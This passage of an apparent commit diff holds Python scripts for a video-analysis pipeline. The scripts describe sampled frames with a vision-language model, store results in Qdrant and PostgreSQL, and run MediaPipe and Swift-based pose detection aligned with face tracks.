# Get embedding
embedding = get_embedding(description)
if not embedding:
print(f"[vlm] Failed to get embedding for interval_{interval_index}", file=sys.stderr)
return False
# Generate point ID
import hashlib
point_id = int(hashlib.md5(f"{file_uuid}_interval_{interval_index}".encode()).hexdigest()[:16], 16)
# Build payload
payload = {
"type": "interval",
"file_uuid": file_uuid,
"interval_index": interval_index,
"timestamp_sec": timestamp_sec,
**analysis,
}
# Upsert to Qdrant
try:
headers = {}
if qdrant_api_key:
headers["api-key"] = qdrant_api_key
resp = requests.put(
f"{qdrant_url}/collections/_vlm/points?wait=true",
json={
"points": [{
"id": point_id,
"vector": embedding,
"payload": payload,
}]
},
headers=headers,
timeout=30,
)
resp.raise_for_status()
print(f"[vlm] Stored to Qdrant: interval_{interval_index}")
return True
except Exception as e:
print(f"[vlm] Qdrant error: {e}", file=sys.stderr)
return False
def analyze_frame(image_path: str, model: str = "llava:7b") -> dict:
"""Analyze a single frame with VLM - scene/background focus."""
# Prompt 1: Scene description (concise)
desc_prompt = "Describe this scene in one sentence. Focus on: location, main activity, visible objects. If unclear, say 'unclear'. Do not guess."
description = call_vlm(image_path, desc_prompt, model)
# Prompt 2: Classification (JSON)
class_prompt = "Classify the scene. Answer in JSON: {\"location\": \"indoor/outdoor/unknown\", \"setting\": \"office/street/home/nature/studio/unknown\", \"lighting\": \"day/night/indoor-light/mixed/unknown\"}. Use 'unknown' if uncertain."
class_raw = call_vlm(image_path, class_prompt, model)
class_data = {}
try:
class_clean = class_raw.replace("```json", "").replace("```", "").strip()
class_data = json.loads(class_clean)
except:
class_data = {}
# Prompt 3: People count
people_prompt = "How many people? Answer a number or 'unclear'."
people_count = call_vlm(image_path, people_prompt, model).strip()
# Prompt 4: Tags
tags_prompt = "List 3 tags for this scene, comma-separated. Examples: office, street, crowd, nature."
tags_raw = call_vlm(image_path, tags_prompt, model)
tags = [t.strip() for t in tags_raw.replace(",", " ").split() if t.strip()][:3]
return {
"vlm_description": description,
"vlm_location": class_data.get("location", "unknown"),
"vlm_setting": class_data.get("setting", "unknown"),
"vlm_lighting": class_data.get("lighting", "unknown"),
"vlm_people_count": people_count,
"vlm_tags": tags,
}
def analyze_intervals(
file_uuid: str,
video_path: str,
interval_sec: float = 10.0,
output_dir: str = "/Users/accusys/momentry/output",
model: str = "llava:7b",
store_qdrant: bool = True,
) -> dict:
"""
Analyze video at regular intervals.
Returns:
Summary dict with all interval analyses
"""
# Get video duration
duration = get_video_duration(video_path)
if duration <= 0:
print(f"[vlm] Cannot get video duration: {video_path}", file=sys.stderr)
return {"error": "Cannot get duration"}
print(f"[vlm] Video: {duration:.1f}s, interval: {interval_sec}s")
# Calculate timestamps
timestamps = []
t = 0.0
while t < duration:
timestamps.append(t)
t += interval_sec
print(f"[vlm] Total frames to analyze: {len(timestamps)}")
results = []
qdrant_api_key = os.environ.get("QDRANT_API_KEY")
# Create temp directory for frames
with tempfile.TemporaryDirectory() as tmpdir:
for i, ts in enumerate(timestamps):
frame_path = f"{tmpdir}/frame_{i:04d}.jpg"
# Extract frame
success = extract_frame_at_time(video_path, ts, frame_path)
if not success:
print(f"[vlm] Failed to extract frame at {ts:.1f}s", file=sys.stderr)
continue
# Analyze
print(f"[vlm] [{i+1}/{len(timestamps)}] {ts:.1f}s...", end=" ", flush=True)
start_time = time.time()
analysis = analyze_frame(frame_path, model)
# Store to Qdrant
if store_qdrant:
store_to_qdrant(analysis, file_uuid, i, ts, qdrant_api_key=qdrant_api_key)
elapsed = time.time() - start_time
print(f"done ({elapsed:.1f}s)")
results.append({
"interval_index": i,
"timestamp_sec": round(ts, 1),
**analysis,
})
# Save profile
profile = {
"file_uuid": file_uuid,
"video_duration_sec": round(duration, 1),
"interval_sec": interval_sec,
"total_intervals": len(timestamps),
"analyzed": len(results),
"model": model,
"intervals": results,
}
output_path = Path(output_dir)
output_path.mkdir(parents=True, exist_ok=True)
profile_path = output_path / f"{file_uuid}_interval_profile.json"
with open(profile_path, "w") as f:
json.dump(profile, f, indent=2)
print(f"[vlm] Saved: {profile_path}")
return profile
def main():
parser = argparse.ArgumentParser(description="VLM analysis at regular intervals")
parser.add_argument("--file-uuid", "-u", required=True, help="File UUID")
parser.add_argument("--video", "-v", required=True, help="Video file path")
parser.add_argument("--interval", "-i", type=float, default=10.0, help="Interval in seconds (default: 10)")
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
parser.add_argument("--model", "-m", default="llava:7b", help="VLM model name")
parser.add_argument("--json", "-j", action="store_true", help="Output as JSON")
args = parser.parse_args()
result = analyze_intervals(
args.file_uuid,
args.video,
args.interval,
args.output_dir,
args.model,
)
if args.json:
print(json.dumps(result, indent=2))
else:
print(f"Analyzed {result.get('analyzed', 0)} intervals")
if __name__ == "__main__":
main()
+257
View File
@@ -0,0 +1,257 @@
#!/usr/bin/env python3
"""
Load trace_profile.json files into PostgreSQL trace_profiles table.
Usage:
python3 scripts/load_trace_profiles.py [--output-dir OUTPUT_DIR] [--dry-run]
"""
import argparse
import json
import os
import sys
from pathlib import Path
import psycopg2
from psycopg2.extras import execute_values
def get_db_connection():
"""Get PostgreSQL connection."""
database_url = os.environ.get(
"DATABASE_URL", "postgresql://accusys@localhost:5432/momentry"
)
return psycopg2.connect(database_url)
def parse_trace_profile(json_path: Path) -> dict | None:
"""Parse trace_profile.json and extract relevant fields."""
try:
with open(json_path, "r", encoding="utf-8") as f:
data = json.load(f)
except Exception as e:
print(f" [ERROR] Failed to read {json_path}: {e}")
return None
# Extract file_uuid and trace_id from path
parts = json_path.parts
file_uuid = None
trace_id = None
for i, part in enumerate(parts):
if part.startswith("trace_"):
trace_id = int(part.replace("trace_", ""))
if i > 0:
file_uuid = parts[i - 1]
break
if not file_uuid or trace_id is None:
print(f" [WARN] Cannot extract file_uuid/trace_id from {json_path}")
return None
return {
"file_uuid": file_uuid,
"trace_id": trace_id,
"name": data.get("label") or data.get("name"),
"start_frame": data.get("start_frame"),
"end_frame": data.get("end_frame"),
"frame_count": data.get("frame_count"),
"key_frame": data.get("key_frame"),
"status": data.get("status", "pending"),
"avg_confidence": data.get("avg_confidence"),
"vlm_description": data.get("vlm_description"),
"vlm_clothing": data.get("vlm_clothing"),
"vlm_tags": data.get("vlm_tags", []),
"vlm_location": data.get("vlm_location"),
"vlm_setting": data.get("vlm_setting"),
"vlm_lighting": data.get("vlm_lighting"),
"vlm_weather": data.get("vlm_weather"),
"vlm_hand_objects": data.get("vlm_hand_objects"),
"vlm_has_plants": data.get("vlm_has_plants"),
"vlm_has_animals": data.get("vlm_has_animals"),
"vlm_background": data.get("vlm_background"),
"vlm_bg_tags": data.get("vlm_bg_tags", []),
"vlm_model": data.get("vlm_model"),
}
def insert_trace_profiles(conn, profiles: list[dict], dry_run: bool = False):
"""Insert trace profiles into PostgreSQL."""
if not profiles:
print("No profiles to insert")
return 0
schema = os.environ.get("DATABASE_SCHEMA", "public")
table = f"{schema}.trace_profiles" if schema != "public" else "trace_profiles"
sql = f"""
INSERT INTO {table} (
file_uuid, trace_id, name, start_frame, end_frame, frame_count,
key_frame, status, avg_confidence,
vlm_description, vlm_clothing, vlm_tags, vlm_location, vlm_setting,
vlm_lighting, vlm_weather, vlm_hand_objects, vlm_has_plants, vlm_has_animals,
vlm_background, vlm_bg_tags, vlm_model
) VALUES %s
ON CONFLICT (file_uuid, trace_id) DO UPDATE SET
name = EXCLUDED.name,
start_frame = EXCLUDED.start_frame,
end_frame = EXCLUDED.end_frame,
frame_count = EXCLUDED.frame_count,
key_frame = EXCLUDED.key_frame,
status = EXCLUDED.status,
avg_confidence = EXCLUDED.avg_confidence,
vlm_description = EXCLUDED.vlm_description,
vlm_clothing = EXCLUDED.vlm_clothing,
vlm_tags = EXCLUDED.vlm_tags,
vlm_location = EXCLUDED.vlm_location,
vlm_setting = EXCLUDED.vlm_setting,
vlm_lighting = EXCLUDED.vlm_lighting,
vlm_weather = EXCLUDED.vlm_weather,
vlm_hand_objects = EXCLUDED.vlm_hand_objects,
vlm_has_plants = EXCLUDED.vlm_has_plants,
vlm_has_animals = EXCLUDED.vlm_has_animals,
vlm_background = EXCLUDED.vlm_background,
vlm_bg_tags = EXCLUDED.vlm_bg_tags,
vlm_model = EXCLUDED.vlm_model,
updated_at = NOW()
"""
if dry_run:
print(f"[DRY-RUN] Would insert {len(profiles)} profiles")
return len(profiles)
cursor = conn.cursor()
# Prepare values
values = [
(
p["file_uuid"],
p["trace_id"],
p["name"],
p["start_frame"],
p["end_frame"],
p["frame_count"],
p["key_frame"],
p["status"],
p["avg_confidence"],
p["vlm_description"],
p["vlm_clothing"],
p["vlm_tags"],
p["vlm_location"],
p["vlm_setting"],
p["vlm_lighting"],
p["vlm_weather"],
p["vlm_hand_objects"],
p["vlm_has_plants"],
p["vlm_has_animals"],
p["vlm_background"],
p["vlm_bg_tags"],
p["vlm_model"],
)
for p in profiles
]
execute_values(cursor, sql, values)
conn.commit()
cursor.close()
return len(profiles)
def main():
parser = argparse.ArgumentParser(description="Load trace profiles into PostgreSQL")
parser.add_argument(
"--output-dir",
default="/Users/accusys/momentry/output",
help="Output directory containing trace_profile.json files",
)
parser.add_argument(
"--dry-run",
action="store_true",
help="Don't actually insert, just show what would be done",
)
parser.add_argument(
"--batch-size",
type=int,
default=100,
help="Batch size for inserts",
)
args = parser.parse_args()
output_dir = Path(args.output_dir)
if not output_dir.exists():
print(f"Error: Output directory {output_dir} does not exist")
sys.exit(1)
# Find all trace_profile.json files
print(f"Scanning {output_dir} for trace_profile.json files...")
trace_profiles = list(output_dir.glob("*/trace_*/trace_profile.json"))
print(f"Found {len(trace_profiles)} trace_profile.json files")
if not trace_profiles:
print("No trace_profile.json files found")
sys.exit(0)
# Parse profiles
print("\nParsing trace profiles...")
profiles = []
for i, json_path in enumerate(trace_profiles):
if (i + 1) % 500 == 0:
print(f" Parsed {i + 1}/{len(trace_profiles)} files...")
profile = parse_trace_profile(json_path)
if profile:
profiles.append(profile)
print(f"Successfully parsed {len(profiles)} profiles")
# Filter profiles with VLM data
vlm_profiles = [
p
for p in profiles
if p.get("vlm_description") or p.get("vlm_clothing") or p.get("vlm_tags")
]
print(f"Profiles with VLM data: {len(vlm_profiles)}")
# Insert into PostgreSQL
if not args.dry_run:
print("\nConnecting to PostgreSQL...")
conn = get_db_connection()
else:
conn = None
print("\n[DRY-RUN] Skipping database connection")
# Insert in batches
batch_size = args.batch_size
total_inserted = 0
for i in range(0, len(profiles), batch_size):
batch = profiles[i : i + batch_size]
if conn:
inserted = insert_trace_profiles(conn, batch, args.dry_run)
total_inserted += inserted
if (i // batch_size + 1) % 10 == 0:
print(
f" Inserted batch {i // batch_size + 1} ({len(batch)} profiles)"
)
else:
total_inserted += len(batch)
if conn:
conn.close()
print(f"\n✅ Done! Inserted {total_inserted} trace profiles")
# Show sample
if vlm_profiles:
print("\nSample VLM profile:")
sample = vlm_profiles[0]
print(f" file_uuid: {sample['file_uuid']}")
print(f" trace_id: {sample['trace_id']}")
print(f" name: {sample['name']}")
print(f" vlm_description: {sample.get('vlm_description', '')[:100]}...")
print(f" vlm_tags: {sample.get('vlm_tags', [])[:5]}")
if __name__ == "__main__":
main()
+246
View File
@@ -0,0 +1,246 @@
#!/opt/homebrew/bin/python3.11
"""
MediaPipe Pose with Face Frame Alignment
1. Load frames with faces from Apple Vision face_traced.json
2. Run MediaPipe pose only on those frames
3. Filter poses aligned with face bboxes
Usage:
python3 scripts/mediapipe_pose_aligned.py --video /path/to/video.mp4 --file-uuid <uuid> --output-dir /path/to/output
Output:
{uuid}.pose.mediapipe.aligned.json
"""
import argparse
import json
import os
import sys
import time
from pathlib import Path
try:
import cv2
import mediapipe as mp
import numpy as np
from mediapipe.tasks.python.vision import PoseLandmarker, PoseLandmarkerOptions
from mediapipe.tasks.python.core.base_options import BaseOptions
except ImportError as e:
print(f"Missing dependency: {e}", file=sys.stderr)
sys.exit(1)
LANDMARK_NAMES = [
"nose", "left_eye_inner", "left_eye", "left_eye_outer",
"right_eye_inner", "right_eye", "right_eye_outer",
"left_ear", "right_ear", "mouth_left", "mouth_right",
"left_shoulder", "right_shoulder", "left_elbow", "right_elbow",
"left_wrist", "right_wrist", "left_pinky", "right_pinky",
"left_index", "right_index", "left_thumb", "right_thumb",
"left_hip", "right_hip", "left_knee", "right_knee",
"left_ankle", "right_ankle", "left_heel", "right_heel",
"left_foot_index", "right_foot_index",
]
def point_in_bbox(x, y, bbox):
"""Check if point is inside bbox."""
return bbox['x'] <= x <= bbox['x'] + bbox['width'] and bbox['y'] <= y <= bbox['y'] + bbox['height']
def face_keypoints_aligned(keypoints, face_bboxes):
"""Check if nose, left_eye, right_eye all in same face bbox."""
kp_dict = {kp['name']: kp for kp in keypoints}
required = ['nose', 'left_eye', 'right_eye']
if not all(k in kp_dict for k in required):
return False, None
for bbox in face_bboxes:
all_in = all(point_in_bbox(kp_dict[k]['x'], kp_dict[k]['y'], bbox) for k in required)
if all_in:
return True, bbox
return False, None
def process_video(
video_path: str,
face_json_path: str,
output_path: str,
file_uuid: str,
) -> dict:
"""
Process video with MediaPipe pose on frames with faces.
"""
# Load face data
print(f"[pose_aligned] Loading face data: {face_json_path}")
with open(face_json_path) as f:
face_data = json.load(f)
face_frames = face_data.get('frames', {})
print(f"[pose_aligned] Frames with faces: {len(face_frames)}")
# Download model
model_path = os.path.expanduser("~/.mediapipe/models/pose_landmarker_heavy.task")
if not os.path.exists(model_path):
os.makedirs(os.path.dirname(model_path), exist_ok=True)
print(f"[pose_aligned] Downloading model...")
import urllib.request
url = "https://storage.googleapis.com/mediapipe-models/pose_landmarker/pose_landmarker_heavy/float16/1/pose_landmarker_heavy.task"
urllib.request.urlretrieve(url, model_path)
# Initialize pose detector
options = PoseLandmarkerOptions(
base_options=BaseOptions(model_asset_path=model_path),
running_mode=mp.tasks.vision.RunningMode.VIDEO,
)
detector = PoseLandmarker.create_from_options(options)
# Open video
cap = cv2.VideoCapture(video_path)
if not cap.isOpened():
print(f"[pose_aligned] Cannot open video", file=sys.stderr)
return {"error": "Cannot open video"}
fps = cap.get(cv2.CAP_PROP_FPS)
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
print(f"[pose_aligned] Video: {total_frames} frames, {fps:.2f} fps, {width}x{height}")
frames_data = []
total_poses = 0
aligned_poses = 0
start_time = time.time()
# Process only frames with faces
face_frame_nums = sorted(int(k) for k in face_frames.keys())
for i, frame_num in enumerate(face_frame_nums):
# Seek to frame
cap.set(cv2.CAP_PROP_POS_FRAMES, frame_num)
ret, frame = cap.read()
if not ret:
continue
# Get face bboxes for this frame
face_frame = face_frames[str(frame_num)]
face_bboxes = []
for face in face_frame.get('faces', []):
face_bboxes.append({
'x': face['x'], 'y': face['y'],
'width': face['width'], 'height': face['height']
})
# Detect pose
rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
mp_image = mp.Image(mp.ImageFormat.SRGB, rgb_frame)
results = detector.detect_for_video(mp_image, int(frame_num * 1000 / fps))
if results.pose_landmarks:
persons = []
for pose_landmarks in results.pose_landmarks:
total_poses += 1
# Convert landmarks
keypoints = []
for idx, landmark in enumerate(pose_landmarks):
name = LANDMARK_NAMES[idx] if idx < len(LANDMARK_NAMES) else f"landmark_{idx}"
kp = {
"name": name,
"x": landmark.x * width,
"y": landmark.y * height,
"z": landmark.z if hasattr(landmark, 'z') else 0,
"confidence": landmark.visibility if hasattr(landmark, 'visibility') else 1.0,
}
keypoints.append(kp)
# Check alignment
aligned, matched_bbox = face_keypoints_aligned(keypoints, face_bboxes)
if aligned:
aligned_poses += 1
face_keypoints = [kp for kp in keypoints if kp['name'] in ['nose', 'left_eye', 'right_eye']]
persons.append({
"keypoints": keypoints,
"face_keypoints": face_keypoints,
"matched_face_bbox": matched_bbox,
})
if persons:
frames_data.append({
"frame": frame_num,
"timestamp": frame_num / fps,
"persons": persons,
})
if (i + 1) % 500 == 0:
elapsed = time.time() - start_time
print(f"[pose_aligned] Processed {i+1}/{len(face_frame_nums)} frames, {aligned_poses} aligned poses ({elapsed:.1f}s)")
cap.release()
detector.close()
elapsed = time.time() - start_time
# Build output
output = {
"file_uuid": file_uuid,
"processor": "mediapipe_pose_aligned",
"fps": fps,
"total_frames": total_frames,
"face_frames_processed": len(face_frame_nums),
"total_poses_detected": total_poses,
"aligned_poses": aligned_poses,
"alignment_rate": f"{aligned_poses / total_poses * 100:.1f}%" if total_poses > 0 else "0%",
"frames_with_aligned_pose": len(frames_data),
"elapsed_seconds": round(elapsed, 2),
"frames": frames_data,
}
# Save
with open(output_path, "w") as f:
json.dump(output, f)
print(f"\n[pose_aligned] Saved: {output_path}")
print(f"[pose_aligned] Total poses detected: {total_poses}")
print(f"[pose_aligned] Aligned poses: {aligned_poses} ({output['alignment_rate']})")
print(f"[pose_aligned] Frames with aligned pose: {len(frames_data)}")
print(f"[pose_aligned] Elapsed: {elapsed:.1f}s")
return output
def main():
parser = argparse.ArgumentParser(description="MediaPipe pose aligned with face frames")
parser.add_argument("--video", "-v", required=True, help="Video file path")
parser.add_argument("--file-uuid", "-u", required=True, help="File UUID")
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
args = parser.parse_args()
output_path = Path(args.output_dir)
face_json = output_path / f"{args.file_uuid}.face_traced.json"
if not face_json.exists():
print(f"[pose_aligned] Face file not found: {face_json}", file=sys.stderr)
sys.exit(1)
output_file = output_path / f"{args.file_uuid}.pose.mediapipe.aligned.json"
result = process_video(
args.video,
str(face_json),
str(output_file),
args.file_uuid,
)
if __name__ == "__main__":
main()
+219
View File
@@ -0,0 +1,219 @@
#!/opt/homebrew/bin/python3.11
"""
MediaPipe Pose Processor - Using MediaPipe Pose Landmarker
Detects human pose with 33 keypoints, including face landmarks (nose, eyes).
Coordinates are normalized (0-1), converted to pixel coordinates.
Usage:
python3 scripts/mediapipe_pose_processor.py --video /path/to/video.mp4 --file-uuid <uuid> --output-dir /path/to/output
Output:
{uuid}.pose.mediapipe.json
"""
import argparse
import json
import os
import sys
import time
from pathlib import Path
try:
import cv2
import mediapipe as mp
import numpy as np
from mediapipe.tasks.python.vision import PoseLandmarker, PoseLandmarkerOptions
from mediapipe.tasks.python.core.base_options import BaseOptions
except ImportError as e:
print(f"Missing dependency: {e}", file=sys.stderr)
sys.exit(1)
# MediaPipe Pose landmark names (33 keypoints)
LANDMARK_NAMES = [
"nose", "left_eye_inner", "left_eye", "left_eye_outer",
"right_eye_inner", "right_eye", "right_eye_outer",
"left_ear", "right_ear", "mouth_left", "mouth_right",
"left_shoulder", "right_shoulder", "left_elbow", "right_elbow",
"left_wrist", "right_wrist", "left_pinky", "right_pinky",
"left_index", "right_index", "left_thumb", "right_thumb",
"left_hip", "right_hip", "left_knee", "right_knee",
"left_ankle", "right_ankle", "left_heel", "right_heel",
"left_foot_index", "right_foot_index",
]
def process_video(
video_path: str,
output_path: str,
file_uuid: str,
sample_interval: int = 3, # Match Apple Vision default
) -> dict:
"""
Process video with MediaPipe Pose.
Args:
video_path: Path to video file
output_path: Output JSON path
file_uuid: File UUID
sample_interval: Process every N frames
Returns:
Dict with pose data
"""
# Download model if not exists
model_path = os.path.expanduser("~/.mediapipe/models/pose_landmarker_heavy.task")
if not os.path.exists(model_path):
os.makedirs(os.path.dirname(model_path), exist_ok=True)
print(f"[mediapipe_pose] Downloading model...")
import urllib.request
url = "https://storage.googleapis.com/mediapipe-models/pose_landmarker/pose_landmarker_heavy/float16/1/pose_landmarker_heavy.task"
urllib.request.urlretrieve(url, model_path)
print(f"[mediapipe_pose] Model downloaded to {model_path}")
# Initialize Pose Landmarker
options = PoseLandmarkerOptions(
base_options=BaseOptions(model_asset_path=model_path),
running_mode=mp.tasks.vision.RunningMode.VIDEO,
)
detector = PoseLandmarker.create_from_options(options)
# Open video
cap = cv2.VideoCapture(video_path)
if not cap.isOpened():
print(f"[mediapipe_pose] Cannot open video: {video_path}", file=sys.stderr)
return {"error": "Cannot open video"}
fps = cap.get(cv2.CAP_PROP_FPS)
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
print(f"[mediapipe_pose] Video: {total_frames} frames, {fps:.2f} fps, {width}x{height}")
print(f"[mediapipe_pose] Processing every {sample_interval} frames...")
frames_data = []
frame_num = 0
processed_count = 0
start_time = time.time()
while True:
ret, frame = cap.read()
if not ret:
break
# Process every N frames
if frame_num % sample_interval == 0:
# Convert BGR to RGB
rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# Create MediaPipe Image
mp_image = mp.Image(mp.ImageFormat.SRGB, rgb_frame)
# Detect pose
results = detector.detect_for_video(mp_image, int(frame_num * 1000 / fps))
if results.pose_landmarks:
for pose_landmarks in results.pose_landmarks:
keypoints = []
face_keypoints = []
for idx, landmark in enumerate(pose_landmarks):
name = LANDMARK_NAMES[idx] if idx < len(LANDMARK_NAMES) else f"landmark_{idx}"
kp = {
"name": name,
"x": landmark.x * width,
"y": landmark.y * height,
"z": landmark.z if hasattr(landmark, 'z') else 0,
"confidence": landmark.visibility if hasattr(landmark, 'visibility') else 1.0,
}
keypoints.append(kp)
if name in ["nose", "left_eye", "right_eye"]:
face_keypoints.append(kp)
# Calculate bbox from all keypoints
valid_kps = [kp for kp in keypoints if kp["confidence"] > 0.3]
if valid_kps:
x_coords = [kp["x"] for kp in valid_kps]
y_coords = [kp["y"] for kp in valid_kps]
bbox = {
"x": min(x_coords),
"y": min(y_coords),
"width": max(x_coords) - min(x_coords),
"height": max(y_coords) - min(y_coords),
}
else:
bbox = {"x": 0, "y": 0, "width": 0, "height": 0}
frames_data.append({
"frame": frame_num,
"timestamp": frame_num / fps,
"persons": [{
"keypoints": keypoints,
"bbox": bbox,
"face_keypoints": face_keypoints,
}],
})
processed_count += 1
if processed_count % 100 == 0:
elapsed = time.time() - start_time
print(f"[mediapipe_pose] Processed {processed_count} poses ({elapsed:.1f}s)")
frame_num += 1
cap.release()
detector.close()
elapsed = time.time() - start_time
# Build output
output = {
"file_uuid": file_uuid,
"processor": "mediapipe_pose",
"fps": fps,
"frame_count": total_frames,
"sample_interval": sample_interval,
"total_poses": len(frames_data),
"elapsed_seconds": round(elapsed, 2),
"frames": frames_data,
}
# Save
with open(output_path, "w") as f:
json.dump(output, f)
print(f"[mediapipe_pose] Saved: {output_path}")
print(f"[mediapipe_pose] Total poses: {len(frames_data)}")
print(f"[mediapipe_pose] Elapsed: {elapsed:.1f}s")
return output
def main():
parser = argparse.ArgumentParser(description="MediaPipe Pose Processor")
parser.add_argument("--video", "-v", required=True, help="Video file path")
parser.add_argument("--file-uuid", "-u", required=True, help="File UUID")
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
parser.add_argument("--sample-interval", "-s", type=int, default=3, help="Process every N frames")
args = parser.parse_args()
output_path = Path(args.output_dir) / f"{args.file_uuid}.pose.mediapipe.json"
result = process_video(
args.video,
str(output_path),
args.file_uuid,
args.sample_interval,
)
if "error" not in result:
print(f"\n[mediapipe_pose] Done. Output: {output_path}")
if __name__ == "__main__":
main()
+1
View File
@@ -109,6 +109,7 @@ if __name__ == "__main__":
parser.add_argument("--uuid", "-u", default="")
parser.add_argument("--sample-interval", type=int, default=30)
parser.add_argument("--recognition-level", choices=["fast", "accurate"], default="accurate")
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
args = parser.parse_args()
publisher = RedisPublisher(args.uuid) if args.uuid else None
+2
View File
@@ -291,6 +291,8 @@ def _fallback(video_path, output_path, uuid, sample_interval):
frame_count += 1
cap.release()
result = {"frame_count": len(frames), "fps": fps, "frames": frames}
if len(frames) == 0:
result["status"] = "no_face"
with open(output_path, "w") as f:
json.dump(result, f, indent=2)
return result
+195
View File
@@ -0,0 +1,195 @@
#!/opt/homebrew/bin/python3.11
"""
Pose Expansion Processor V2
Calls swift_pose_expansion which:
1. Reads face_traced.json (from face tracking with trace_id)
2. Expands pose detection from trace frames
3. Stops when 3 consecutive frames have no pose
4. Outputs at 8Hz sampling (floor(fps/8))
Flow:
face_processor.py → face.json
store_traced_faces.py → face_traced.json (with trace_id)
pose_processor.py → pose.json (this script)
appearance_processor.py → appearance.json
"""
import sys
import os
import json
import argparse
import subprocess
import time
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
from redis_publisher import RedisPublisher
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
SWIFT_BIN = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "release", "swift_pose_expansion")
SWIFT_BIN_DEBUG = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "debug", "swift_pose_expansion")
OUTPUT_DIR = os.environ.get("MOMENTRY_OUTPUT_DIR", "/Users/accusys/momentry/output")
def process_pose(
video_path: str,
output_path: str,
uuid: str = "",
publisher: RedisPublisher = None,
) -> dict:
"""Process pose expansion from face traces.
Args:
video_path: Path to video file
output_path: Path to output pose.json
uuid: File UUID for logging
publisher: Redis publisher for progress updates
"""
# Check if pose.json already exists
if os.path.exists(output_path):
with open(output_path) as f:
data = json.load(f)
frame_count = len(data.get("frames", []))
print(f"[Pose] Output exists: {output_path} ({frame_count} frames)", file=sys.stderr)
if publisher:
publisher.progress("pose", 100, 100, f"{frame_count} frames (exists)")
return data
# Determine file_uuid from output_path
file_uuid = os.path.basename(output_path).replace(".pose.json", "")
# Find face_traced.json
face_traced_path = os.path.join(OUTPUT_DIR, f"{file_uuid}.face_traced.json")
face_json_path = os.path.join(OUTPUT_DIR, f"{file_uuid}.face.json")
# Prefer face_traced.json (has trace_id), fallback to face.json
input_face_path = None
if os.path.exists(face_traced_path):
input_face_path = face_traced_path
print(f"[Pose] Using face_traced.json: {face_traced_path}", file=sys.stderr)
elif os.path.exists(face_json_path):
# Try to run face tracking to generate face_traced.json
print(f"[Pose] face_traced.json not found, running face tracker...", file=sys.stderr)
try:
tracker_script = os.path.join(SCRIPT_DIR, "store_traced_faces.py")
if os.path.exists(tracker_script):
result = subprocess.run(
["python3", tracker_script, "--file-uuid", file_uuid],
capture_output=True, text=True, timeout=300
)
if result.returncode == 0 and os.path.exists(face_traced_path):
input_face_path = face_traced_path
print(f"[Pose] Face tracing completed: {face_traced_path}", file=sys.stderr)
else:
print(f"[Pose] Face tracing failed, falling back to face.json", file=sys.stderr)
input_face_path = face_json_path
else:
input_face_path = face_json_path
except Exception as e:
print(f"[Pose] Face tracking error: {e}, falling back to face.json", file=sys.stderr)
input_face_path = face_json_path
if input_face_path == face_json_path:
print(f"[Pose] WARNING: Using face.json without trace_id", file=sys.stderr)
else:
print(f"[Pose] ERROR: No face.json found for {file_uuid}", file=sys.stderr)
# Return empty result
empty_result = {"frame_count": 0, "fps": 0.0, "frames": []}
with open(output_path, "w") as f:
json.dump(empty_result, f)
return empty_result
# Build swift_pose_expansion if needed
swift_bin = SWIFT_BIN if os.path.exists(SWIFT_BIN) else SWIFT_BIN_DEBUG
if not os.path.exists(swift_bin):
build_dir = os.path.join(SCRIPT_DIR, "swift_processors")
print(f"[Pose] Building swift_pose_expansion in {build_dir}...", file=sys.stderr)
result = subprocess.run(
["swift", "build", "-c", "release", "--product", "swift_pose_expansion"],
cwd=build_dir, capture_output=True, text=True
)
if result.returncode != 0:
print(f"[Pose] Build failed: {result.stderr}", file=sys.stderr)
raise RuntimeError("Failed to build swift_pose_expansion")
swift_bin = SWIFT_BIN
# Run swift_pose_expansion
cmd = [
swift_bin,
video_path,
input_face_path,
output_path,
]
if uuid:
cmd.extend(["--uuid", uuid])
print(f"[Pose] Running: {' '.join(cmd)}", file=sys.stderr)
t0 = time.time()
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
# Monitor progress
last_progress = ""
while proc.poll() is None:
time.sleep(5)
# Read stderr for progress
try:
# Non-blocking read
import select
if select.select([proc.stderr], [], [], 0)[0]:
line = proc.stderr.readline().strip()
if line and line != last_progress:
last_progress = line
print(f"[Pose] {line}", file=sys.stderr)
if publisher and "frames" in line:
publisher.progress("pose", 50, 100, line)
except Exception:
pass
# Read remaining output
stdout, stderr = proc.communicate()
if stdout:
print(stdout, file=sys.stderr)
if stderr:
print(stderr, file=sys.stderr)
elapsed = time.time() - t0
if proc.returncode != 0:
print(f"[Pose] ERROR: swift_pose_expansion exited with code {proc.returncode}", file=sys.stderr)
if publisher:
publisher.error("pose", f"Process failed with code {proc.returncode}")
raise RuntimeError(f"swift_pose_expansion failed: {proc.returncode}")
# Load result
if not os.path.exists(output_path):
print(f"[Pose] ERROR: Output file not created: {output_path}", file=sys.stderr)
raise RuntimeError("Pose output not created")
with open(output_path) as f:
result = json.load(f)
frame_count = len(result.get("frames", []))
print(f"[Pose] Done: {frame_count} frames in {elapsed:.1f}s", file=sys.stderr)
if publisher:
publisher.progress("pose", 100, 100, f"{frame_count} frames")
publisher.complete("pose", f"{frame_count} frames")
return result
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Pose Expansion Processor")
parser.add_argument("video_path", help="Video file path")
parser.add_argument("output_path", help="Output pose.json path")
parser.add_argument("--uuid", "-u", default="", help="File UUID for logging")
args = parser.parse_args()
publisher = RedisPublisher(args.uuid) if args.uuid else None
if publisher:
publisher.info("pose", "POSE_START")
result = process_pose(args.video_path, args.output_path, args.uuid, publisher)
print(f"Pose: {len(result.get('frames', []))} frames with poses")
+162
View File
@@ -0,0 +1,162 @@
#!/usr/bin/env python3
"""
